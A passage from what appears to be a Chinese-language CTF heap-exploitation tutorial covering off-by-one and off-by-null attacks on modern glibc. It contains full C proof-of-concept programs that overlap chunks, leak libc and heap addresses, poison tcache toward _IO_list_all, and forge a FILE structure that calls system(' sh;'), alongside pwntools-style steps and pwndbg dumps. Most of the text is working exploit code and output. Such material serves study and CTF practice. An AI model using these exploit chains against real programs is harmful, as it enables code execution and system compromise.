n[i] = (char*)malloc(0x90);
}
p = (long long *)malloc(0x40);
p_copy=p;
n[7] = (char*)malloc(0x90);
malloc(0x10);

p[0]=0;
p[1]=0x41;
p[2]=(long long)&p-0x18;
p[3]=(long long)&p-0x10;
p[8]=0x40;
p[9]=0xa0;
for(int i=0;i<7;i++){
free(n[i]);
}
free(n[7]);

p=p_copy;
malloc(0x100);

long long libc=(long long)p[3];
p[1]=0xe1;
p[2]=(long long)n[7]-0x50;
p[3]=(long long)n[7]-0x30;
p[4]=0;
p[5]=0xe1;
p[6]=(long long)n[7]-0x50;
p[7]=(long long)n[7]-0x10;
p[8]=0;
p[9]=0xe1;
p[10]=(long long)n[7]-0x30;
p[11]=libc;
malloc(0xd0);

*(long long*)n[7]=(libc+0xaa0-0xd0)^(((long long)n[7])>>12);
malloc(0xd0);

long long* attack=(long long*)malloc(0xd0);
attack[0]=0x3b687320;
attack[1]=(libc+0xaa0)-0x10-0xd0;
attack[2]=0;
attack[3]=0;
attack[4]=0;
attack[5]=libc-0x1ab3d0-0xd0;
attack[6]=0;
attack[7]=0;
attack[8]=0;
attack[9]=0;
attack[10]=0;
attack[11]=0;
attack[12]=0;
attack[13]=0;
attack[14]=0;
attack[15]=0;
attack[16]=0;
attack[17]=n[1]+0x10;
attack[18]=0;
attack[19]=0;
attack[20]=(libc+0xaa0)-0x40-0xd0;
attack[21]=0;
attack[22]=0;
attack[23]=0;
attack[24]=0;
attack[25]=0;
attack[26]=0;
attack[27]=libc-0x18f8-0x20-0xd0;

puts("Hello, world!");
return 0;
}

Off by …

off by oneoff by null都是经典的off by ...型漏洞

如果我们能控制堆块的大小为0x...8这样,就利用了堆块的空间复用,这样off by就可以通过溢出控制物理相邻的下一个堆块的size位,造成堆块堆叠,从而实现UAF

一般来说,off by one是可以覆盖allocated的堆块的size进行堆块重叠或者覆盖free的堆块的unsortedbinsize从而申请到更大内存造成重叠,而off by null大多是配合unlink使用

off by one

通过size位的覆盖造成堆块堆叠,在unsortedbin中的堆叠可以切割来使被覆盖的堆块头出现libc地址,覆盖tcachefastbinsmallbin的指针形成任意地址堆块分配等等

// glibc-2.39 gcc -g -o ./1 ./1.c

#include <stdio.h>
#include <stdlib.h>

char *heap[8];

int main() {
setvbuf(stdin,0,2,0);
setvbuf(stdout,0,2,0);

heap[0]=malloc(0x418);
heap[1]=malloc(0x418);
heap[2]=malloc(0x58);
heap[3]=malloc(0x58);
heap[4]=malloc(0x418);
heap[5]=malloc(0x418);
heap[0][0x418]='\xe1';

free(heap[1]);
heap[1]=NULL;

heap[1]=malloc(0x418);
printf("leak:%llx\n",((long long*)heap[2])[0]);
long long libc_base=((long long*)heap[2])[0]-0x203b20;
printf("libc:%llx\n",libc_base);

free(heap[1]);
heap[1]=NULL;

heap[2][0x58]='\xc1';
heap[4][0x58]='\xd1';
heap[4][0x59]='\x03';

free(heap[3]);
heap[3]=NULL;
free(heap[2]);
heap[2]=NULL;

heap[2]=malloc(0x4d0);
printf("leak:%llx\n",((long long*)heap[2])[144]);
long long heap_base=((long long*)heap[2])[144]<<12;
printf("heap:%llx\n",heap_base);

((long long*)heap[2])[132]=(libc_base+0x2044c0)^((heap_base+0xae0)>>12); // _IO_list_all
malloc(0xb0);

long long *attack=(long long*)malloc(0x100);
attack[0]=0x3b687320; // " sh;"
attack[5]=libc_base+0x58750; // system
attack[17]=(long long)heap[0]+0x20; // prot:w
attack[20]=(long long)attack-0x10;
attack[26]=(long long)attack-0x40;
attack[27]=libc_base+0x202228; // _IO_wfile_jumps

long long *p = (long long*)malloc(0xb0);
p[0]=(long long)attack;

puts("[+]attack");
exit(0);
return 0;
}

off by null

2.29-

prev_size可控

低地址  ---------------------- >  高地址
chunk1 | ... | chunk0 | chunk | top

控制chunk0size0x...01这样的,并通过off by null修改prev_size为前面任意数目堆块大小之和并将size改为0x...00这样的,然后free chunk0形成合并(注意不要进入tcache

prev_size不可控

低地址  ---------------------- >  高地址
chunk1 | chunk2 | chunk3 | top

free chunk2chunk3prev_size留下size,然后通过chunk1off by nullchunk2size改小,然后分割成几个chunk(称为chunk_2_1、chunk_2_2、chunk_2_3),然后free chunk_2_1 + free chunk3,这样就会将chunk2 chunk3全都合并到top

要满足chunk2last_remainer

2.29+

新增的保护

if (chunksize (p) != prev_size (next_chunk (p)))
malloc_printerr ("corrupted size vs. prev_size");

方法一

该方法只使用了不大于0xf0大小的堆块(以下说的堆块大小都是包含头部的,注意与malloc中输入的大小不同),需要的申请次数比较多(填充tcache

注意,下面的堆块是从0x…3a0开始申请的

  1. 先将0x90、0xa0、0xb0、0xc0、0xd0、0xe0、0xf0的7个堆块全申请出来,一共49个堆块(用于填充tcache),然后申请一些功能性堆块,布局如下
0x90 * 7	0~6
0xa0 * 7 7~13
0xb0 * 7 14~20
0xc0 * 7 21~27
0xd0 * 7 28~34
0xe0 * 7 35~41
0xf0 * 7 42~48
0xa0 49
0xa0 50
0x20 51
0xb0 52
0xc0 53
0xe0 54
0xe0 55
0xf0 56
0xf0 57
0xa0 58
0xf0 59
0x20 60
  1. 在第56号堆块中间伪造一个0xe0大小的堆块
0x0 : 0
0x8 : 0xf0
0x10: 0x200
0x18: 0xe0
  1. 填充一些tcache便于后面释放的堆块进入unsortedbin中合并
free 0~6	0x90
free 14~20 0xb0
free 21~28 0xc0
free 35~41 0xe0
free 42~48 0xf0
  1. 生成一个大的unsortedbin,一共大0x420
free 52~56		0xb0 + 0xc0 + 0xe0 + 0xe0 + 0xf0 = 0x420
  1. 重新取出tcache中的堆块(这里malloc 1这让表示重新将1号堆块申请回来)
malloc 0~6		0x90
malloc 14~20 0xb0
malloc 21~27 0xc0
malloc 35~41 0xe0
malloc 42~48 0xf0
  1. 使unsortedbin中的堆块进入到largebin中去,分别申请0xa0、0xa0(off by null)、0x90、0x90、0xe0,在第二次申请0xa0是利用off by null将剩余的堆块0x420-0xa0-0xa0=0x2e0的大小改为0x200,这恰好是0x90+0x90+0xe0=0x200,刚好与第二步相照应伪造了一个虚假的free chunk,同时也是为了保持第57号的prev_size0x2e0保持不变,此时堆块的布局是
0x90 * 7	0~6
0xa0 * 7 7~13
0xb0 * 7 14~20
0xc0 * 7 21~27
0xd0 * 7 28~34
0xe0 * 7 35~41
0xf0 * 7 42~48
0xa0 49
0xa0 50
0x20 51
0xa0 52
0xa0 53
0x90 54
0x90 55
0xe0 56
0xe0 碎片
0xf0 57(prev_size = 0x2e0)
0xa0 58
0xf0 59
0x20 60
  1. 在第54号的堆块中留下伪造的fd、bk使其通过unlink检查(因为要free的堆块的prev_size计算出来刚好是到54号堆块),使用unsortedbin的链条留下堆块地址,释放3个间隔的堆块并使第54号堆块是第二个释放的即可使其在unsortedbin链上的fd、bk都指向一个堆块
unsortedbin
all: 0x55555555bf70 —▸ 0x55555555bb00 —▸ 0x55555555b900 —▸ 0x7ffff7fb4d00 (main_arena+96) ◂— 0x55555555bf70

// 这里0x55555555bb00就是第54号堆块

pwndbg> tele 0x55555555bb00
00:0000│ 0x55555555bb00 ◂— 0
01:0008│ 0x55555555bb08 ◂— 0x91
02:0010│ 0x55555555bb10 —▸ 0x55555555b900 ◂— 0
03:0018│ 0x55555555bb18 —▸ 0x55555555bf70 ◂— 0

具体的操作步骤是

free 0~6
free 7~13
free 42~48
free 50
free 54
free 59
free 53
  1. 重新取出tcache中的堆块
malloc 0~6		0x90
malloc 7~13 0xa0
malloc 42~48 0xf0
  1. 放入smallbin,申请一个不在unsortedbin的堆块大小(此时unsortedbin中的堆块大小分别是0x130、0xf0、0xa0),实际上malloc(0xd8)就会将所有unsortedbin中的堆块放入smallbin中,并且由于与其大小最相近并且切割下来剩余大小小于堆块要求最小值,于是就将0xf0这个堆块分配给了我们,也就是相当于malloc 59;为了保护我们留下的指针,我们将由合并产生的0x130(0xa0+0x90)重新分割为0xc0+0x70,这样fd、bk都保存在0xc0大小的堆块末尾
malloc 59
malloc(0xb8)

现在的堆布局是

0x90 * 7	0~6
0xa0 * 7 7~13
0xb0 * 7 14~20
0xc0 * 7 21~27
0xd0 * 7 28~34
0xe0 * 7 35~41
0xf0 * 7 42~48
0xa0 49
0xa0 50(smallbins)
0x20 51
0xa0 52
0xc0 53
0x70 54(unsortedbin)
0x90 55
0xe0 56
0xe0 碎片
0xf0 57(prev_size = 0x2e0)
0xa0 58
0xf0 59
0x20 60

然后拓展unsortedbin中的54号堆块,free 55,合成一个0x100大小的堆块,并将其重新分割大小,由0x70+0x90变为0xc0+0x40

free 0~6
free 55
malloc 0~6
malloc(0xb8)
malloc 50
malloc(0x38)

现在的堆布局是

0x90 * 7	0~6
0xa0 * 7 7~13
0xb0 * 7 14~20
0xc0 * 7 21~27
0xd0 * 7 28~34
0xe0 * 7 35~41
0xf0 * 7 42~48
0xa0 49
0xa0 50
0x20 51
0xa0 52
0xc0 53
0xc0 54
0x40 55
0xe0 56
0xe0 碎片
0xf0 57(prev_size = 0x2e0)
0xa0 58
0xf0 59
0x20 60
  1. 伪造好bk->fd==P
free 7~13
free 21~27
free 42~48
free 50
free 54
free 59
free 58

此时

unsortedbin
all: 0x55555555bed0 —▸ 0x55555555bb20 —▸ 0x55555555b900 —▸ 0x7ffff7fb4d00 (main_arena+96) ◂— 0x55555555bed0

pwndbg> tele 0x55555555bb00
00:0000│ 0x55555555bb00 ◂— 0
01:0008│ 0x55555555bb08 ◂— 0x91
02:0010│ 0x55555555bb10 —▸ 0x55555555b900 ◂— 0
03:0018│ 0x55555555bb18 —▸ 0x55555555bf70 ◂— 0
04:0020│ 0x55555555bb20 ◂— 0
05:0028│ 0x55555555bb28 ◂— 0xc1 // 54
06:0030│ 0x55555555bb30 —▸ 0x55555555b900 ◂— 0
07:0038│ 0x55555555bb38 —▸ 0x55555555bed0 ◂— 0

pwndbg> tele 0x55555555bed0
00:0000│ 0x55555555bed0 ◂— 0 // 58
01:0008│ 0x55555555bed8 ◂— 0x191
02:0010│ 0x55555555bee0 —▸ 0x55555555bb20 ◂— 0
03:0018│ 0x55555555bee8 —▸ 0x7ffff7fb4d00 (main_arena+96) —▸ 0x55555555c080 ◂— 0
04:0020│ 0x55555555bef0 ◂— 0
... ↓ 3 skipped
pwndbg>
08:0040│ 0x55555555bf10 ◂— 0
... ↓ 7 skipped
pwndbg>
10:0080│ 0x55555555bf50 ◂— 0 // 59
... ↓ 4 skipped
15:00a8│ 0x55555555bf78 ◂— 0xf1
16:00b0│ 0x55555555bf80 —▸ 0x55555555bb20 ◂— 0
17:00b8│ 0x55555555bf88 —▸ 0x7ffff7fb4d00 (main_arena+96) —▸ 0x55555555c080 ◂— 0

只需要我们off by null59号堆块的bk指针就可以实现bk->fd==P

  1. 先复原,并将58、59合并的堆块0xa0+0xf0重新分割为0xd0+0xc0
malloc 7~13
malloc 21~27
malloc 42~48
malloc(0xc8)
malloc 54
malloc(0xb8)
malloc 50

再从top chunk中申请0xa0、0xa0、0x20的堆块

此时堆块布局如下

0x90 * 7	0~6
0xa0 * 7 7~13
0xb0 * 7 14~20
0xc0 * 7 21~27
0xd0 * 7 28~34
0xe0 * 7 35~41
0xf0 * 7 42~48
0xa0 49
0xa0 50
0x20 51
0xa0 52
0xc0 53
0xc0 54
0x40 55
0xe0 56
0xe0 碎片
0xf0 57(prev_size = 0x2e0)
0xd0 58
0xc0 59
0x20 60
0xa0 61
0xa0 62
0x20 63
  1. 接下来是实现fd->bk==P
free 7~13
free 21~27
free 62
free 50
free 54
free 49

类似的

unsortedbin
all: 0x55555555b860 —▸ 0x55555555bb20 —▸ 0x55555555c120 —▸ 0x7ffff7fb4d00 (main_arena+96) ◂— 0x55555555b860

pwndbg> tele 0x55555555bb00
00:0000│ 0x55555555bb00 ◂— 0
01:0008│ 0x55555555bb08 ◂— 0x91
02:0010│ 0x55555555bb10 —▸ 0x55555555b900 ◂— 0
03:0018│ 0x55555555bb18 —▸ 0x55555555bf70 ◂— 0
04:0020│ 0x55555555bb20 ◂— 0
05:0028│ 0x55555555bb28 ◂— 0xc1 // 54
06:0030│ 0x55555555bb30 —▸ 0x55555555c120 ◂— 0
07:0038│ 0x55555555bb38 —▸ 0x55555555b860 ◂— 0

pwndbg> tele 0x55555555b860
00:0000│ 0x55555555b860 ◂— 0
01:0008│ 0x55555555b868 ◂— 0x141 // 49
02:0010│ 0x55555555b870 —▸ 0x55555555bb20 ◂— 0
03:0018│ 0x55555555b878 —▸ 0x7ffff7fb4d00 (main_arena+96) —▸ 0x55555555c1e0 ◂— 0
04:0020│ 0x55555555b880 ◂— 0
... ↓ 15 skipped
15:00a8│ 0x55555555b908 ◂— 0xa1 // 50
16:00b0│ 0x55555555b910 —▸ 0x55555555c120 ◂— 0
17:00b8│ 0x55555555b918 —▸ 0x55555555bb20 ◂— 0

也是类似的复原

malloc 7~13
malloc 21~27
malloc 54
malloc 62
malloc(0xc8)
malloc(0x68)

49、500xa0+0xa0切割为0xd0+0x70

现在的布局是

0x90 * 7	0~6
0xa0 * 7 7~13
0xb0 * 7 14~20
0xc0 * 7 21~27
0xd0 * 7 28~34
0xe0 * 7 35~41
0xf0 * 7 42~48
0xd0 49
0x70 50
0x20 51
0xa0 52
0xc0 53
0xc0 54
0x40 55
0xe0 56
0xe0 碎片
0xf0 57(prev_size = 0x2e0)
0xd0 58
0xc0 59
0x20 60
0xa0 61
0xa0 62
0x20 63

然后可以在第4958号堆块使用off by null就完成了unlink的检查,在user data的偏移分别是0xa80xa0

  1. 然后就是在第53号堆块伪造fake size通过size的检查即可,然后先填充tcache再触发unlink
pwndbg> bins
tcachebins
0xf0 [ 7]: 0x55555555b1e0 —▸ 0x55555555b2d0 —▸ 0x55555555b3c0 —▸ 0x55555555b4b0 —▸ 0x55555555b5a0 —▸ 0x55555555b690 —▸ 0x55555555b780 ◂— 0
fastbins
empty
unsortedbin
all: 0x55555555bb00 —▸ 0x7ffff7fb4d00 (main_arena+96) ◂— 0x55555555bb00
smallbins
empty
largebins
empty
pwndbg> tele 0x55555555bb00
00:0000│ 0x55555555bb00 ◂— 0
01:0008│ 0x55555555bb08 ◂— 0x3d1
02:0010│ 0x55555555bb10 —▸ 0x7ffff7fb4d00 (main_arena+96) —▸ 0x55555555c1e0 ◂— 0
03:0018│ 0x55555555bb18 —▸ 0x7ffff7fb4d00 (main_arena+96) —▸ 0x55555555c1e0 ◂— 0
04:0020│ 0x55555555bb20 ◂— 0
05:0028│ 0x55555555bb28 ◂— 0xc1
06:0030│ 0x55555555bb30 ◂— 0x55555555b
07:0038│ 0x55555555bb38 ◂— 0

调试的话可以使用这个

#include <stdio.h>  
#include <stdlib.h>

long long* arr[64];
void free_o(int i) {
free(arr[i]);
arr[i] = NULL;
}

int main() {
char* p = (char*)malloc(0x100);
for(int i=0;i<7;i++) {
for(int j=0;j<7;j++) {
arr[7*i+j] = (long long*)malloc(0x88+0x10*i);
}
}
arr[49]=(long long*)malloc(0x98);
arr[50]=(long long*)malloc(0x98);
arr[51]=(long long*)malloc(0x18);
arr[52]=(long long*)malloc(0xa8);
arr[53]=(long long*)malloc(0xb8);
arr[54]=(long long*)malloc(0xd8);
arr[55]=(long long*)malloc(0xd8);
arr[56]=(long long*)malloc(0xe8);
arr[57]=(long long*)malloc(0xe8);
arr[58]=(long long*)malloc(0x98);
arr[59]=(long long*)malloc(0xe8);
arr[60]=(long long*)malloc(0x18);
arr[56][0]=0x200;
arr[56][1]=0xe0;
int fr[40]={0,1,2,3,4,5,6,14,15,16,17,18,19,20,21,22,23,24,25,26,27,35,36,37,38,39,40,41,42,43,44,45,46,47,48,52,53,54,55,56};
for(int i=0;i<40;i++) {
free_o(fr[i]);
}
for(int i=0;i<7;i++) {
if(i==1||i==4){
continue;
}
for(int j=0;j<7;j++) {
arr[7*i+j] = (long long*)malloc(0x88+0x10*i);
}
}
arr[52]=(long long*)malloc(0x98);
arr[53]=(long long*)malloc(0x98);
((char*)(arr[53]))[0x98]='\x00';
arr[54]=(long long*)malloc(0x88);
arr[55]=(long long*)malloc(0x88);
arr[56]=(long long*)malloc(0xd8);
int fr2[21]={0,1,2,3,4,5,6,7,8,9,10,11,12,13,42,43,44,45,46,47,48};
for(int i=0;i<21;i++) {
free_o(fr2[i]);
}
free_o(50);
free_o(54);
free_o(59);
free_o(53);

for(int i=0;i<7;i++) {
if(i==2||i==3||i==4||i==5){
continue;
}
for(int j=0;j<7;j++) {
arr[7*i+j] = (long long*)malloc(0x88+0x10*i);
}
}
arr[59]=(long long*)malloc(0xd8);
arr[53]=(long long*)malloc(0xb8);
for(int i=0;i<7;i++) {
free_o(i);
}
free_o(55);
for(int i=0;i<7;i++) {
arr[i]=(long long*)malloc(0x88);
}
arr[50]=(long long*)malloc(0x98);
arr[54]=(long long*)malloc(0xb8);
arr[55]=(long long*)malloc(0x38);
int fr3[21]={42,43,44,45,46,47,48,7,8,9,10,11,12,13,21,22,23,24,25,26,27};
for(int i=0;i<21;i++) {
free_o(fr3[i]);
}
free_o(50);
free_o(54);
free_o(59);
free_o(58);

for(int i=0;i<7;i++) {
if(i==0||i==2||i==4||i==5){
continue;
}
for(int j=0;j<7;j++) {
arr[7*i+j] = (long long*)malloc(0x88+0x10*i);
}
}
arr[58]=(long long*)malloc(0xc8);
arr[54]=(long long*)malloc(0xb8);
arr[59]=(long long*)malloc(0xb8);
arr[50]=(long long*)malloc(0x98);

arr[61]=(long long*)malloc(0x98);
arr[62]=(long long*)malloc(0x98);
arr[63]=(long long*)malloc(0x18);
int fr4[14]={7,8,9,10,11,12,13,21,22,23,24,25,26,27};
for(int i=0;i<14;i++) {
free_o(fr4[i]);
}
free_o(62);
free_o(50);
free_o(54);
free_o(49);

for(int i=0;i<7;i++) {
if(i==0||i==2||i==4||i==5||i==6){
continue;
}
for(int j=0;j<7;j++) {
arr[7*i+j] = (long long*)malloc(0x88+0x10*i);
}
}
arr[54]=(long long*)malloc(0xb8);
arr[62]=(long long*)malloc(0x98);
arr[49]=(long long*)malloc(0xc8);
arr[50]=(long long*)malloc(0x68);

((char*)(arr[49]))[0xa8]='\x00';
((char*)(arr[58]))[0xa0]='\x00';
arr[53][19]=0x2e1;
int fr5[7]={42,43,44,45,46,47,48};
for(int i=0;i<7;i++) {
free_o(fr5[i]);
}
free_o(57);
puts("unlink success");
return 0;
}

方法二

largebin的构造绕过

add(0,0x418,b'a')
add(1,0x108,b'a')
add(2,0x438,b'a')
add(3,0x438,b'a')
add(4,0x108,b'a')
add(5,0x488,b'a')
add(6,0x428,b'a')
add(7,0x108,b'a')

delete(0)
delete(3)
delete(6)
delete(2)

add(2,0x458,b'\x00'*0x438+b'\x51\x05')
add(3,0x418,b'a')
add(0,0x418,b'0'*0x100)
add(6,0x428,b'a')

delete(0)
delete(3)
add(0,0x418,b'\x00'*8)

delete(6)
delete(5)
add(5,0x4f8,b'\x00'*0x488+p64(0x431))
add(6,0x3b8,b'a')
add(3,0x418,b'a')

delete(4)
add(4,0x108,b'\x00'*0x100+p64(0x550))

delete(5)

下面演示一下,执行到delete(6)

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Freed 0x73ccc601ace0 0x61107b3f7c00
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x440 Used None None
0x61107b3f7c00 0x0 0x440 Freed 0x61107b3f7290 0x61107b3f85e0
0x61107b3f8040 0x440 0x110 Used None None
0x61107b3f8150 0x0 0x490 Used None None
0x61107b3f85e0 0x0 0x430 Freed 0x61107b3f7c00 0x73ccc601ace0
0x61107b3f8a10 0x430 0x110 Used None None
delete(2)造成合并

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Freed 0x73ccc601ace0 0x61107b3f85e0
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x880 Freed 0x61107b3f85e0 0x73ccc601ace0
0x61107b3f8040 0x880 0x110 Used None None
0x61107b3f8150 0x0 0x490 Used None None
0x61107b3f85e0 0x0 0x430 Freed 0x61107b3f7290 0x61107b3f77c0
0x61107b3f8a10 0x430 0x110 Used None None

将原来的2号扩展0x20,将原来三号的头保护起来,成为新的2号,而原来的3号缩小了0x20

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Freed 0x73ccc601b0d0 0x61107b3f85e0
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x460 Used None None
0x61107b3f7c20 0x0 0x420 Freed 0x73ccc601ace0 0x73ccc601ace0
0x61107b3f8040 0x420 0x110 Used None None
0x61107b3f8150 0x0 0x490 Used None None
0x61107b3f85e0 0x0 0x430 Freed 0x61107b3f7290 0x73ccc601b0d0
0x61107b3f8a10 0x430 0x110 Used None None

保护的fd、bk指向0号和6号,另外把chunk的大小改为chunk3_size+chunk4_size

pwndbg> tele 0x61107b3f7c00
00:0000│ 0x61107b3f7c00 ◂— 0
01:0008│ 0x61107b3f7c08 ◂— 0x551
02:0010│ 0x61107b3f7c10 —▸ 0x61107b3f7290 ◂— 0
03:0018│ 0x61107b3f7c18 —▸ 0x61107b3f85e0 ◂— 0
04:0020│ 0x61107b3f7c20 ◂— 0
05:0028│ 0x61107b3f7c28 ◂— 0x421
06:0030│ 0x61107b3f7c30 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0
07:0038│ 0x61107b3f7c38 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0

接着可以把其他的堆块全申请回来,这里原来的3号prev_size地址一定是以\x00结尾,这样我们就可以利用off-by-null让他从指向新的3号到指向旧的3号

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Used None None
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x460 Used None None
0x61107b3f7c20 0x0 0x420 Used None None
0x61107b3f8040 0x420 0x110 Used None None
0x61107b3f8150 0x0 0x490 Used None None
0x61107b3f85e0 0x0 0x430 Used None None
0x61107b3f8a10 0x430 0x110 Used None None

接着我们构造0号bk指针指向原来的3号地址

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Freed 0x73ccc601ace0 0x61107b3f7c20
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x460 Used None None
0x61107b3f7c20 0x0 0x420 Freed 0x61107b3f7290 0x73ccc601ace0
0x61107b3f8040 0x420 0x110 Used None None
0x61107b3f8150 0x0 0x490 Used None None
0x61107b3f85e0 0x0 0x430 Used None None
0x61107b3f8a10 0x430 0x110 Used None None

off-by-null

pwndbg> tele 0x61107b3f7290
00:0000│ 0x61107b3f7290 ◂— 0
01:0008│ 0x61107b3f7298 ◂— 0x421
02:0010│ 0x61107b3f72a0 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0
03:0018│ 0x61107b3f72a8 —▸ 0x61107b3f7c20 ◂— 0
04:0020│ 0x61107b3f72b0 ◂— 0
05:0028│ 0x61107b3f72b8 ◂— 0

off-by-null

00:0000│     0x61107b3f7290 ◂— 0
01:0008│ 0x61107b3f7298 ◂— 0x421
02:0010│ r9 0x61107b3f72a0 ◂— 0
03:0018│ 0x61107b3f72a8 —▸ 0x61107b3f7c00 ◂— 0
04:0020│ 0x61107b3f72b0 ◂— 0
05:0028│ 0x61107b3f72b8 ◂— 0

bk指向了原来的3

pwndbg> tele 0x61107b3f7c00
00:0000│ 0x61107b3f7c00 ◂— 0
01:0008│ 0x61107b3f7c08 ◂— 0x551
02:0010│ 0x61107b3f7c10 —▸ 0x61107b3f7290 ◂— 0
03:0018│ 0x61107b3f7c18 —▸ 0x61107b3f85e0 ◂— 0
04:0020│ 0x61107b3f7c20 ◂— 0
05:0028│ 0x61107b3f7c28 ◂— 0x421
06:0030│ 0x61107b3f7c30 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0
07:0038│ 0x61107b3f7c38 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0

接着修改6号的fd指向原来的3号

先free掉块合并

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Used None None
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x460 Used None None
0x61107b3f7c20 0x0 0x420 Freed 0x73ccc601ace0 0x61107b3f8150
0x61107b3f8040 0x420 0x110 Used None None
0x61107b3f8150 0x0 0x8c0 Freed 0x61107b3f7c20 0x73ccc601ace0
0x61107b3f8a10 0x8c0 0x110 Used None None

off-by-null

pwndbg> tele 0x61107b3f8150+0x490
00:0000│ 0x61107b3f85e0 ◂— 0
01:0008│ 0x61107b3f85e8 ◂— 0x431
02:0010│ 0x61107b3f85f0 —▸ 0x61107b3f7c20 ◂— 0
03:0018│ 0x61107b3f85f8 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0
04:0020│ 0x61107b3f8600 ◂— 0
... ↓ 3 skipped

off-by-null

pwndbg> tele 0x61107b3f8150+0x490
00:0000│ 0x61107b3f85e0 ◂— 0
01:0008│ 0x61107b3f85e8 ◂— 0x431
02:0010│ 0x61107b3f85f0 —▸ 0x61107b3f7c00 ◂— 0
03:0018│ 0x61107b3f85f8 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0
04:0020│ 0x61107b3f8600 ◂— 0
... ↓ 3 skipped

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Used None None
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x460 Used None None
0x61107b3f7c20 0x0 0x420 Freed 0x73ccc601b0d0 0x73ccc601b0d0
0x61107b3f8040 0x420 0x110 Used None None
0x61107b3f8150 0x0 0x500 Used None None
0x61107b3f8650 0x0 0x3c0 Freed 0x73ccc601ace0 0x73ccc601ace0
0x61107b3f8a10 0x3c0 0x110 Used None None

fd成功指向旧的3号,这样我们就已经构造完了

pwndbg> x/6gx 0x61107b3f7290
0x61107b3f7290: 0x0000000000000000 0x0000000000000421
0x61107b3f72a0: 0x0000000000000000 0x000061107b3f7c00
0x61107b3f72b0: 0x0000000000000000 0x0000000000000000
pwndbg> x/6gx 0x61107b3f7c00
0x61107b3f7c00: 0x0000000000000000 0x0000000000000551
0x61107b3f7c10: 0x000061107b3f7290 0x000061107b3f85e0
0x61107b3f7c20: 0x0000000000000000 0x0000000000000421
pwndbg> x/6gx 0x61107b3f85e0
0x61107b3f85e0: 0x0000000000000000 0x0000000000000431
0x61107b3f85f0: 0x000061107b3f7c00 0x000073ccc601ace0
0x61107b3f8600: 0x0000000000000000 0x0000000000000000

接着让4可以实现UAFoff-by-null修改5号的prev_inuse,并且使prev_size改为3号和4号的大小和,再free掉5,这样旧的3号、4号、5号就会合并成一个大free块,但是4号还可以使用

off-by-null

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Used None None
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x460 Used None None
0x61107b3f7c20 0x0 0x420 Used None None
0x61107b3f8040 0x420 0x110 Used None None
0x61107b3f8150 0x0 0x500 Used None None
0x61107b3f8650 0x0 0x3c0 Used None None
0x61107b3f8a10 0x3c0 0x110 Used None None

off-by-null

pwndbg> tele 0x61107b3f8150
00:0000│ 0x61107b3f8150 ◂— 0x550
01:0008│ 0x61107b3f8158 ◂— 0x500
02:0010│ 0x61107b3f8160 ◂— 0
... ↓ 5 skipped

堆状态

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Used None None
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x460 Used None None
0x61107b3f7c20 0x0 0x420 Used None None
0x61107b3f8040 0x420 0x110 Freed 0x0 0x0
0x61107b3f8150 0x550 0x500 Used None None
0x61107b3f8650 0x0 0x3c0 Used None None
0x61107b3f8a10 0x3c0 0x110 Used None None

最后一步,把5号delete,由于prev_inuse为0,所以找prev_size定位到原来的3号头,通过fd、bk指针找到0号和6号,而0号的bk指向原来的3号,6号的fd指向原来的3号,而新增的检查

pwndbg> tele 0x61107b3f7c00
00:0000│ 0x61107b3f7c00 ◂— 0
01:0008│ 0x61107b3f7c08 ◂— 0x551
02:0010│ 0x61107b3f7c10 —▸ 0x61107b3f7290 ◂— 0
03:0018│ 0x61107b3f7c18 —▸ 0x61107b3f85e0 ◂— 0
04:0020│ 0x61107b3f7c20 ◂— 0
05:0028│ 0x61107b3f7c28 ◂— 0x421
06:0030│ 0x61107b3f7c30 —▸ 0x73ccc6010061 ◂— 0xd00e4201c80ef002
07:0038│ 0x61107b3f7c38 —▸ 0x73ccc601b0d0 (main_arena+1104) —▸ 0x73ccc601b0c0 (main_arena+1088) —▸ 0x73ccc601b0b0 (main_arena+1072) —▸ 0x73ccc601b0a0 (main_arena+1056) ◂— ...
pwndbg> tele 0x61107b3f7c00+0x550
00:0000│ 0x61107b3f8150 ◂— 0x550
01:0008│ 0x61107b3f8158 ◂— 0x500
02:0010│ 0x61107b3f8160 ◂— 0

满足,于是delete5号合并

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Used None None
0x61107b3f76b0 0x420 0x110 Used None None
